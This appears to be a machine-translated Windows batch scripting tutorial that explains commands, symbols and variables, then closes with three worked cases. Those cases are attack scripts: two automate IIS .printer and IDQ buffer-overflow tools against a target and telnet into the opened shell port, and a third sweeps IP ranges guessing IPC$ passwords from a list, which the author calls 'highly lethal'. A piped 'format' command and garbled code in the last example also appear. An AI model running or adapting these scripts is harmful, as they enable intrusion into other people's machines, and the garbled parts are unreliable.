Batch Learning Guide

Source: Internet
Author: User
Tags: echo command, echo message, eol, ranges

Part 1: dedicated commands for Batch Processing

A batch file is a text file with the extension .bat that contains a sequence of commands which are executed in order. These commands are collectively called batch commands. The batch commands are introduced below.
1. Rem
REM is the comment command, used to add annotations to a program. The text after it is neither displayed nor executed when the program runs. Example:
REM What you see now is a comment. This line will not be executed. In the examples that follow, explanations are placed after REM; please note this.

2. Echo
ECHO is the echo command. Its main parameters are off and on; echo message displays a specific message. Example:
Echo off
REM The line above turns echo off, so executed commands are not displayed.
Echo This is the message.
REM The line above displays "This is the message."
Execution result:
C:\> echo.bat
This is the message.

3. Goto
Goto jumps to a label. In a batch file, ":xxx" defines a label and "goto xxx" continues execution at the command after that label. Example:
:label
REM The line above is the label.
Dir C:\
Dir D:\
Goto label
REM The line above jumps back to the label, so the two DIR commands repeat until you press Ctrl+C.

4. Call
The call command runs another batch file from within a batch file; when the called batch file finishes, the original one continues. Example:
The content of batch file 2.bat is:
Echo This is the content of 2.
The content of batch file 1.bat is:
Echo This is the content of 1.
Call 2.bat
Echo The content of 1 and 2 is displayed completely.
The execution result is:
C:\> 1.bat
This is the content of 1.
This is the content of 2.
The content of 1 and 2 is displayed completely.

5. Pause
Pause suspends execution and displays the following prompt until a key is pressed. Example:
C:\> pause
Press any key to continue . . .

6. If
If is the conditional statement. Its syntax forms are:
If [not] errorlevel number command
If [not] string1==string2 command
If [not] exist filename command
Note:
[not] inverts the result of the test, i.e. "if not ...".
Errorlevel is the exit code returned after a command executes.
The exit code ranges from 0 to 255. The condition is true when the returned code is greater than or equal to the specified number, so when several errorlevel tests are chained they must be ordered from the largest number to the smallest.
string1==string2: string1 and string2 are both character data; the comparison is case-sensitive, and the equal sign in this condition must be written twice (exactly equal). If they match, the command is executed.
exist filename tests whether a file or directory exists.
The IF errorlevel statement must be placed after a command: once that command has run, errorlevel holds its return code and can be tested.
Example:
1. If [not] errorlevel number command
Tests the return code of the command just executed.
Echo off
Dir Z:
REM If the exit code is 1 (failure), jump to label 1.
If errorlevel 1 goto 1
REM If the exit code is 0 (success), jump to label 0.
If errorlevel 0 goto 0
:0
Echo Command executed successfully!
REM Jump to the exit label and finish.
Goto exit
:1
Echo Command execution failed!
REM Jump to the exit label and finish.
Goto exit
:exit
REM This is the exit of the program.
2. If string1==string2 command
Tests the value of a parameter and branches on it.
Echo off
REM Quoting both sides keeps the comparison valid even when %1 is empty.
If not "%1"=="2" goto No
Echo Variables are equal!
Goto exit
:No
Echo Variables are not equal
Goto exit
:exit
Run it as follows to see the effect: C:\> test.bat number

3. If [not] exist filename command
Tests whether a specific file exists and branches on it.
Echo off
If not exist autoexec.bat goto 1
Echo The file exists!
Goto exit
:1
Echo The file does not exist!
Goto exit
:exit
Run this batch file from drive C and from drive D to compare the results.
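The three IF forms combined in one script, as an added example that is not part of the original article. It assumes a log file and a search word passed as parameters, relies on the documented exit codes of the FIND command (0 = match found, 1 = no match, 2 = file could not be read), and shows why chained errorlevel tests must run from the largest number downward:

```batch
@echo off
REM Added example (not from the original article): all three IF forms in one script.
REM Usage: ifdemo.bat <logfile> <word>
REM %~1 and %~2 are the parameters with surrounding quotes removed.

REM 1. if string1==string2: guard against a missing parameter. Quoting both
REM    sides keeps the comparison valid even when %2 is empty.
if "%~2"=="" goto usage

REM 2. if exist: refuse to continue if the log file is not there.
if not exist "%~1" goto nofile

REM 3. if errorlevel: run a command, then test its exit code from high to low.
REM    "if errorlevel 1" is also true for exit code 2, so 2 must be tested first.
find /c "%~2" "%~1" >nul
if errorlevel 2 goto readerror
if errorlevel 1 goto nomatch
echo "%~2" was found in %1
goto end

:nomatch
echo "%~2" was not found in %1
goto end

:readerror
echo FIND could not read %1
goto end

:nofile
echo File %1 does not exist
goto end

:usage
echo Usage: %~n0 logfile word

:end
```

Run it as C:\> ifdemo.bat security.log "Logon Failure"; swapping the two errorlevel tests would send every unreadable file down the "not found" branch, which is the ordering mistake the note above warns about.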
7. For
The for command is a special command that executes a command repeatedly. For commands can also be nested; this article introduces only the basic usage and does not apply nesting, which is explained later. In a batch file the for command is written with a doubled percent sign:
For %%c In (set) Do [command] [arguments]
On the command line it is written with a single percent sign:
For %c In (set) Do [command] [arguments]
Common parameters:
/L: the set is a sequence of numbers (start,step,end) running from start to end in increments of step. So (1,1,5) generates the sequence 1 2 3 4 5, and (5,-1,1) generates the sequence 5 4 3 2 1.
/D: if the set contains wildcards, it matches directory names instead of file names.

/F: reads data from the specified file (or from a string or the output of a command) and parses it into variables. Its options are:
eol=c: the end-of-line comment character (just one character); lines that start with it are skipped.
skip=n: the number of lines to skip at the beginning of the file.
delims=xxx: the delimiter set; this replaces the default delimiters of space and tab.
tokens=x,y,m-n: which tokens of each line are passed to the for body on each iteration. This causes additional variable names to be allocated. The m-n form is a range, specifying the mth through nth tokens. If the last character of the token string is an asterisk, one more variable is allocated and receives the remaining text of the line after the last token parsed.
usebackq: selects the alternative syntax: a string in back quotes is executed as a command, a string in single quotes is a literal string, and double quotes may be used to quote file names in the file set.
Here is an example:
For /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k
This parses each line of myfile.txt, ignores lines that start with a semicolon, and passes the second and third tokens of each line to the for body, using commas and/or spaces as delimiters. Note that the for body references %i to get the second token, %j to get the third token, and %k to get all remaining tokens after the third. For file names that contain spaces, you must enclose them in double quotation marks; to use double quotation marks this way you also need the usebackq option, otherwise the double quotes are interpreted as defining a string to be parsed.
%i is declared explicitly in the for statement; %j and %k are declared implicitly through the tokens= option. You can specify up to 26 tokens through tokens=, as long as you do not try to declare a variable beyond the letter 'z' or 'Z'. Remember that for variable names are single letters, case-sensitive and global, and no more than 52 can be in use at the same time.
You can also use for /F to parse a string directly: enclose the file set between the parentheses in single quotation marks, and the string is treated as a single line of input from a file. Finally, for /F can parse the output of a command: put the command between the parentheses in back quotes. That string is passed to a child cmd.exe as a command line, and its output is captured in memory and parsed as if it were a file. For example:
For /F "usebackq delims==" %i in (`set`) do @echo %i
enumerates the names of the environment variables in the current environment.
The following simple example illustrates the difference between /L and no parameter:
Delete the files 1.txt, 2.txt, 3.txt, 4.txt and 5.txt.
Example:
Echo off
For /L %%F in (1,1,5) Do del %%F.txt
Or
For %%F in (1,2,3,4,5) Do del %%F.txt
Both commands have the same effect as running:
C:\> Del 1.txt
C:\> Del 2.txt
C:\> Del 3.txt
C:\> Del 4.txt
C:\> Del 5.txt
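The /F options described above (eol, skip, delims, tokens with a trailing asterisk, usebackq for both a quoted file name and a back-quoted command) and the /L form, all applied to a small constructed logon log, as an added example that is not part of the original article. The file events.csv and its contents are constructed for the example:

```batch
@echo off
setlocal
REM Added example, not from the original article: FOR /F options applied to a
REM constructed sample file named events.csv.
REM   eol=#        lines starting with # are comments and are skipped
REM   skip=1       the header line is skipped
REM   delims=,     fields are separated by commas
REM   tokens=1,2*  %%A = field 1, %%B = field 2, %%C = the rest of the line

REM Create the sample file (constructed data, deleted again at the end).
> events.csv echo time,user,event,detail
>> events.csv echo # comment line, ignored because of eol=#
>> events.csv echo 09:00,alice,logon success
>> events.csv echo 09:05,bob,logon failure,bad password
>> events.csv echo 09:06,bob,logon failure,bad password

REM Print only the failed logons. The file name is quoted, so usebackq is needed.
for /f "usebackq eol=# skip=1 tokens=1,2* delims=," %%A in ("events.csv") do (
    echo %%C | find "failure" >nul && echo %%A user=%%B detail=%%C
)

REM Parse command output instead of a file: back quotes select the command form.
REM FIND /C prints "---------- EVENTS.CSV: 2", so the count is the third token
REM when colon and space are both delimiters.
for /f "usebackq tokens=3 delims=: " %%N in (`find /c "failure" events.csv`) do echo failures: %%N

REM /L counts through a numeric range; without /L the set is an explicit list.
for /l %%N in (1,1,3) do echo /L step %%N
for %%N in (1 2 3) do echo list item %%N

del events.csv
endlocal
```

Because the sample line "09:05,bob,logon failure,bad password" has four fields but tokens=1,2* asks for only two, the asterisk variable %%C keeps "logon failure,bad password" intact, commas included; that is the behaviour to rely on when the last column of a log is free text.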

8. Setlocal
Setlocal starts localization of environment changes in a batch file. After setlocal is executed, environment changes are limited to the batch file; to restore the original settings you must execute endlocal. When the end of a batch file is reached, an implicit endlocal is run for every setlocal that has not been matched by an endlocal. Example:
@Echo off
REM View the environment variable path
Set path
Pause
Setlocal
REM Reset the environment variable path
Set Path=E:\tools
Set path
Pause
Endlocal
Set path
In the example above, the first time path is displayed it is the system default; after setlocal sets it, E:\tools is displayed; and after endlocal it is restored to the system default. In any case the change only lasts while the batch file runs: after the batch file finishes, the environment variable path is back to its original value.
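The same scoping shown with a temporary tool directory on PATH and a variable that exists only inside the block, plus a second setlocal that is deliberately never closed, as an added example that is not part of the original article. The directory C:\tools and the variable TOOLMODE are assumed placeholders:

```batch
@echo off
REM Added example (not from the original article): scoping environment
REM changes with SETLOCAL / ENDLOCAL. C:\tools and TOOLMODE are placeholders.
echo Outer PATH: %PATH%

setlocal
REM Changes between here and ENDLOCAL affect only this block.
set "PATH=C:\tools;%PATH%"
set "TOOLMODE=verbose"
echo Inner PATH: %PATH%
echo TOOLMODE inside block: %TOOLMODE%
endlocal

REM After ENDLOCAL both variables revert; TOOLMODE no longer exists.
echo Outer PATH: %PATH%
if defined TOOLMODE (echo TOOLMODE leaked) else (echo TOOLMODE is undefined again)

REM A block with no ENDLOCAL: the implicit ENDLOCAL at the end of the file
REM still undoes the change, so the caller's environment is left untouched.
setlocal
set "TOOLMODE=quiet"
echo TOOLMODE at end of file: %TOOLMODE%
```

After the file finishes, running set TOOLMODE at the prompt reports that the variable is not defined, which confirms the implicit endlocal; the set "NAME=value" form with the quotes around the whole assignment avoids picking up trailing spaces in the value.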

9. Shift
The shift command lets a batch file use more than ten command-line parameters (%0 to %9). Example using the replaceable parameters described above:
Echo off
Echo %1 %2 %3 %4 %5 %6 %7 %8 %9
Shift
Echo %1 %2 %3 %4 %5 %6 %7 %8 %9
Shift
Echo %1 %2 %3 %4 %5 %6 %7 %8 %9
The execution result is:
C:\> shift.bat 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
These are the nine batch commands, based on Windows 2000.

Part 2: special symbols and Batch Processing

Some symbols are not allowed on the command line, and some have special meanings.
1. Symbol (@)
@ disables the echo of the current line. We saw above that echo off turns off echo for the whole batch file, but the echo off line itself is still echoed. Adding @ in front of it (@echo off) suppresses that line too, so no command is echoed at all.
2. Symbol (>)
> redirects and overwrites. It sends the output of the command to the target that follows (a file, or a device; the default target is the system console). For example:
The content of file 1.txt is:
1 + 1
Run the command C:\> dir *.txt > 1.txt
The contents of 1.txt are now:
The volume in drive C has no label.
The serial number of the volume is 301A-1508.
Directory of C:\
1,005 frunlog.txt
18,598,494 log.txt
5 1.txt
0 aierrorlog.txt
30,571 202.108.txt
5 files, 18,630,070 bytes
0 directories, 1,191,542,784 bytes free
> overwrites the original file content with the output of the command.
When output is redirected to the console device instead, the program shows nothing (note: this is not the same as echo off; echo off hides the echo of the input commands, while this hides the program's own output). Example:
C:\> dir *.txt > NUL
The program produces no display and leaves no trace.
3. Symbol (>>)
The symbol >> works like > but appends to the end of the file instead of overwriting it; like >, it can also redirect output to the console or NUL (usage as above). Example:
File 1.txt again contains:
1 + 1
Run the command C:\> dir *.txt >> 1.txt
The contents of 1.txt are now:
1 + 1
The volume in drive C has no label.
The serial number of the volume is 301A-1508.
Directory of C:\
1,005 frunlog.txt
18,598,494 log.txt
5 1.txt
0 aierrorlog.txt
30,571 202.108.txt
5 files, 18,630,070 bytes
0 directories, 1,191,542,784 bytes free
>> appends the output of the command after the original file content.
4. Symbol (|)
| is the pipe: it passes the output of the previous command to the next command for processing. Example:
C:\> dir C:\ | find "1508"
The serial number of the volume is 301A-1508.
The command above lists C:\ and searches the listing for the string 1508. See find /? for the options of find.
When format is run without a parameter that suppresses its prompt, I used this method to format the disk automatically:
Echo y | format A: /S /Q /V:System
Anyone who has used the format command knows it has an interactive prompt: the user must type y to confirm. Putting echo y in front and piping its output into format with | supplies the y automatically instead of typing it (this command is destructive, be careful when testing it).
5. Symbol (^)
^ is the escape character for the special symbols >, < and &. Placed before one of them in a command, it removes the symbol's special function, so the symbol is treated as an ordinary character. Example:
C:\> echo test ^> 1.txt
test > 1.txt
As the example shows, test is not written into the file 1.txt; instead the string "test > 1.txt" is displayed. This symbol is very useful when building batch files remotely.
6. Symbol (&)
The & symbol allows two or more different commands on one line. If the first command fails, execution of the second command is not affected. Example:
C:\> dir Z:\ & dir Y:\ & dir C:\
The command above lists the contents of drives Z:, Y: and C: in turn, regardless of whether each drive letter exists.
7. Symbol (&&)
The && symbol also allows two or more different commands on one line, but when a command fails, the commands after it are not executed. Example:
C:\> dir Z:\ && dir Y:\ && dir C:\
The command above checks each disk in turn: if the disk exists, the next command runs; if it does not, all subsequent commands are skipped.
8. Symbol ("")
The "" symbol lets a string contain spaces. Any of the following can be used to enter a directory whose name contains a space:
C:\> Cd "Program Files"
C:\> Cd progra~1
C:\> Cd Pro*
All three methods enter the Program Files directory.
9. Symbol (,)
The comma is equivalent to a space and can replace it in some special cases. Example:
C:\> Dir,C:\
10. Symbol (;)
The semicolon separates different targets for the same command; the effect is the same as running the command once for each target. If an error occurs for one target, only that error is reported and the program continues. Example:
Dir C:\;D:\;E:\;F:\
The command above is equivalent to
Dir C:\
Dir D:\
Dir E:\
Dir F:\
Of course there are other special symbols, but they are rarely used and are not explained here one by one.
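The redirection and chaining symbols from this part used together to build a small run log, as an added example that is not part of the original article. The file names report.log and helper.bat are constructed; the operator || (run the next command only on failure) and the form 2>&1 (send error output to the same place as normal output) are standard cmd features that the article itself does not cover:

```batch
@echo off
REM Added example (not from the original article): >, >>, NUL, |, &, &&, ^ and
REM the quoting rule from symbol 8 combined. report.log and helper.bat are
REM constructed file names; || and 2>&1 are standard cmd features not covered above.

REM > creates (or overwrites) the log; >> appends to it.
echo Audit run started > report.log
echo Listing of "%SystemRoot%": >> report.log
dir /b "%SystemRoot%\*.ini" >> report.log

REM && runs the second command only if the first succeeded; || only if it failed.
REM >nul 2>&1 discards both the listing and the error message of DIR.
dir Z:\ >nul 2>&1 && echo Drive Z: is available >> report.log || echo Drive Z: is missing >> report.log

REM & runs both commands regardless of the first one's result.
echo Step A >> report.log & echo Step B >> report.log

REM ^ escapes > so it is written literally into another batch file
REM instead of redirecting this echo.
echo dir *.log ^> listing.txt > helper.bat
echo helper.bat now contains:
type helper.bat

REM | pipes the log through FIND to count the lines that mention a drive.
type report.log | find /c "Drive"

del helper.bat
```

Reading report.log afterwards shows one "Drive Z:" line and two "Step" lines, and helper.bat holds the single line dir *.log > listing.txt, which is exactly how the article's remark about "building batch files remotely" with ^ works in practice.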

Part 3: Batch Processing and variable

Appropriate use of variables makes a batch file much more widely applicable. A batch file can address the parameters %0 to %9, ten in total. %0 holds the batch file name by default and is only replaced by %1 when the shift command is used. For example, if you add %0 in front of %1 in the shift example above, the result is:
C:\> shift.bat 1 2 3 4 5 6 7 8 9 10 11
shift.bat 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
How does the system separate the parameters? The rule is that a space separates them: the text before a space is one parameter and the text after it is another. If your parameter is a long directory name that contains spaces, you need to enclose it in the quotation marks described under special symbol 8 above. Example:
Batch file content:
Echo %1
Echo %2
Echo %3
Enter the following command:
C:\> test "Program Files" Program Files
Program Files
Program
Files
In a complex batch file more than ten parameters may be needed at once, which conflicts with the %0 to %9 limit. How can this be solved? The system also has environment variables (use the set command to view the current ones); for example, the current system directory is %WINDIR% or %SystemRoot%. When more than ten parameters are used at once, we can save some of them into environment variables for later use in the program. The usage is: set A=%1. This defines a new environment variable A; to use it, reference it as %A%. Environment variables are not affected by the shift command; to change one you must set it again, and you can also transfer values between variables. Let's take an example. The batch file is:
Echo off
Set pass=%1
Shift
Set pass1=%1
Shift
Echo %pass% %pass1% %1 %2 %3 %4 %5 %6 %7 %8 %9
Shift
Echo %pass% %pass1% %9
REM Variable transfer
Set pass=%pass1%
Set pass1=%9
Shift
Echo %pass% %pass1% %9
Run the command: C:\> test a b 3 4 5 6 7 8 9 10 k l
a b 3 4 5 6 7 8 9 10 k (note: this line shows 11 values)
a b l (after three shifts, %9 has become l)
b l (result after the variable transfer)
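A general way to handle any number of parameters, combining shift with environment variables as this part describes, as an added example that is not part of the original article. It assumes parameters are passed on the command line; the variable names COUNT and ARG_n are placeholders chosen for the example, and set /a, %~1 and the call trick for double expansion are standard cmd features:

```batch
@echo off
setlocal
REM Added example (not from the original article): any number of parameters
REM collected with SHIFT into environment variables ARG_1, ARG_2, ...
REM since only %0..%9 can be addressed directly. COUNT and ARG_n are
REM placeholder names; %~1 is the parameter with surrounding quotes removed.
set COUNT=0

:next
REM Stop when the next parameter is empty.
if "%~1"=="" goto done
set /a COUNT+=1
REM Save parameter number COUNT as ARG_COUNT; it survives later SHIFTs.
set "ARG_%COUNT%=%~1"
shift
goto next

:done
echo %COUNT% parameters received
REM Read them back by name. CALL makes cmd expand the line a second time,
REM so %%ARG_%%N%% first becomes %ARG_1% and then its value.
for /l %%N in (1,1,%COUNT%) do call echo ARG_%%N = %%ARG_%%N%%
endlocal
```

Running C:\> args.bat a b 3 4 5 6 7 8 9 10 k l "Program Files" prints 13 parameters received followed by one line per parameter, with "Program Files" kept together as ARG_13 because it was quoted on the command line.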

Part 4: complete cases

The above covers the usage of batch commands. Now let's look more closely at some batch files published on the Internet to see how they work. Three examples are analysed in detail below; to keep each program complete, my comments are added after the code lines.
Example 1
This example uses iis5hack.exe to batch handle overflow of hosts with. Printer vulnerabilities. Iis5hack.exeand telnet.exe are used. Iis5hack command format:
Iis5hack <target IP address> <target port> <target version> <overflow connection port> the 10 numbers with the target version 0-9 correspond to the system versions of different languages and sp respectively, the command format used for batch processing is <IIS. bat target IP (Start version number)> Start version number is optional. The program is as follows.
@ Echo off/* close command echo
If "% 1%" = "" Goto help/* determines whether % 1 is null and % 1 is the target IP
If "% 2%" = "1" GOTO 1/* determines whether % 2 is 1. If it is 1, the jump flag 1
If "% 2%" = "2" Goto 2/* % 2 is the start version.
If "% 2%" = "3" Goto 3/* If yes, the execution starts from the matched place.
If "% 2%" = "4" Goto 4
If "% 2%" = "5" Goto 5
If "% 2%" = "6" Goto 6
If "% 2%" = "7" Goto 7
If "% 2%" = "8" Goto 8
If not exist iis5hack.exe goto file/* if no iis5hack.exe is found, the file segment of the flag is executed.
Ping % 1-N 1 | find "sent Ed = 1"/* ping the target once. The result shows that the sent Ed = 1.
If errorlevel 1 goto error/* If the returned code is 1, execute the error segment (Code 1 indicates that no 0 is found, and the error segment is successfully executed)
Iis5hack % 1 80 9 88 | find "good"/* start to overflow the target port 80 System Code 9 after the overflow, the connection port 88 finds the string "good" in the execution result (only after the overflow is successful there will be a string of good)
If not errorlevel 1 goto Telnet/* if there is no error code 1 (overflow successful), execute the content of the Telnet segment.
Echo operating system type 9 failed! /Otherwise, this sentence is displayed.
: 8/* the following code content can be found above
Iis5hack % 1 80 8 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 8 failed!
: 7
Iis5hack % 1 80 7 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 7 failed!
: 6
Iis5hack % 1 80 6 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 6 failed!
: 5
Iis5hack % 1 80 5 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 5 failed!
: 4
Iis5hack % 1 80 4 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 4 failed!
: 3
Iis5hack % 1 80 3 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 3 failed!
: 2
Iis5hack % 1 80 2 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 2 failed!
: 1
Iis5hack % 1 80 1 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 1 failed!
: 0
Iis5hack % 1 80 0 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 0 failed!
Goto Error
: Telnet
Telnet % 1 88/* start to connect to port 88 of the target IP Address
Goto exit/* jump to the exit segment after the connection is interrupted
: Error/* the error section displays the help information after the error.
Echo may be unable to connect to the network or the other party to fix this vulnerability! Please try it manually in the following format!
Echo iis5hack [target IP address] [Web port] [system type] [open port]
Echo Chinese: 0
Echo Chinese + SP1: 1
Echo English: 2
Echo English + SP1: 3
Echo Japanese: 4
Echo Japanese + SP1: 5
Echo Korean: 6
Echo Korean + SP1: 7
Echo in Mexico: 8
Echo Mexican + SP1: 9
Goto exit/* jump to exit
: File/* the file segment shows no information found in the file.
ECHO file iis5hack.exe not found! The program stops running!
Goto exit/* jump to exit
: Help/* help section shows the help format of the batch processing
Echo:
Echo IIS [target IP address]
Echo IIS [target IP address] [Starting number 9-0]
: Exit/* exit is the program exit
There is basically no loop in this batch file, so the code is not difficult!
Example 2
In this example, iisidq.exe is used to batch process instances with idq vulnerabilities. Iisidq.exeand telnet.exe are used. Iisidq.exe is used as follows:
Running parameters: operating system type Destination Address Web port 1 Overflow listening port <enter command 1>
If no command parameter is input, the default value is "cmd.exe ".
The Code Range of the operating system type is 0-14. The command format used for batch processing is <idq. Bat target IP address> as follows:
@ Echo off/* same example 1
If not exist iisidq.exe goto file/* same example 1
If % 1 = "" Goto error/* same example 1
Ping % 1-N 1 | find "received = 1"/* same example 1
If errorlevel 1 goto error1/* same example 1
Set B = % 1/* Create an environment variable B and pass the content of the variable % 1 to environment variable B. The content of variable B will be the target IP address later
Set a = 0/* Create an environment variable A and specify the environment variable A as 0. Because the entire batch processing cycle is used, a is used as the counter.
: No/* start with no
If % A % = 0 set D = 0/* If environment variable a = 0, create environment variable D and set environment variable D = 0.
If % A % = 1 set D = 1/* Environment Variable D is actually the operating system type code, and it is controlled by counters.
If % A % = 2 set D = 2/* changes.
If % A % = 3 set D = 3
If % A % = 4 set D = 4
If % A % = 5 set D = 5
If % A % = 6 set D = 6
If % A % = 7 set D = 7
If % A % = 9 set D = 9
If % A % = 10 set D = 13
If % A % = 11 set D = 14
Goto 0/* after the variable is passed, go to sign 0 to run
: 1
ECHO is executing item % d %! Cannot connect to target % B %! Attempting to connect... please wait ......
: 0/* Indicates 0 to start
Iisidq % d % B % 80 1 99 | find "good"/* Send the overflow command in the format and find the string "good" in the result (the string "good" is displayed only when the code is successfully sent)
If errorlevel 1 GOTO 1/* if there is no good string, no jump is sent
/* Try again at mark 1
Ping 127.0.0.1-N 8> NUL/* Ping yourself 8 times, which is equivalent to a delay of 8 seconds without executing
/* Row result
ECHO is executing item % d %! /* Type of Operating System Reporting Overflow
Telnet % B % 99/* connection overflow Port
Echo./* display a blank line
If % d % = 14 goto error1/* If the operating system type is 14, jump to error1 (loop Exit)
If % d % = 13 set a = 11/* start to reattach the value to the operating system code with the counter
If % d % = 9 set a = 10
If % d % = 7 set a = 9
If % d % = 6 set a = 7
If % d % = 5 set a = 6
If % d % = 4 set a = 5
If % d % = 3 set a = 4
If % d % = 2 set a = 3
If % d % = 1 set a = 2
If % d % = 0 set a = 1
Goto no/* Add a value to complete the no-segment jump execution
: File/* the following are the help prompts after an error
Echo iisidq.exe not found! Put this file in the same directory as this file!
Goto exit
: Error
Echo error! The target IP address cannot be identified! Use the following format to connect!
Echo idq [target IP address]
Goto exit
: Error1
Echo connection failed! This vulnerability or network fault may have been fixed on the target machine!
Please try echo in the following format!
Echo iisidq [target type] [target IP address] [target port] [connection mode] [overflow port]
Echo Telnet [target IP address] [overflow port]
: Exit/* exit of the entire program
This batch file uses a single overall loop driven by a counter to control the whole batch.
Example 3
For/L % A in (255, 255) do for/L % B in (254,) do for/L % C in) do for/F "tokens = 1, 2 *" % E in (userpass.txt) Do net use // % 1. %. % B. % C/IPC $ % E/u: % F
The preceding command is one. We can see that this command uses four for to apply. Usage: C:/> test. the first character in bat 218 contains the second character of the password % E as the username % F and finally executes the command (here I include all the above values, set the password to 123 and the user name to ABC)
Net USR // 218.0.0.1/IPC $123/u: ABC
Of course, some of the above examples may be too simple and inflexible. I have made some modifications to this example (for the complete file, see the CD IPC. BAT). You can check it by yourself if you are interested. The modified program can flexibly search for the range from start to end or from start to maximum IP address. Of course, the function can be enhanced. It's up to you to see if you can become a new tool.
This loop is a little bigger, mainly because it is difficult to replace the numbers of IP addresses. I will not write comments for this batch processing. Please refer to the above content and you will soon understand this batch processing. Do not make it easy to understand! At least this is a batch process that can detect and save weak passwords without any third-party tools !! A simple change is still highly lethal. The biggest advantage of all the above batch processing tests passed in Win2000 and XP is that there is only one batch processing file and there is no false alarm. The disadvantage is that it is too long!
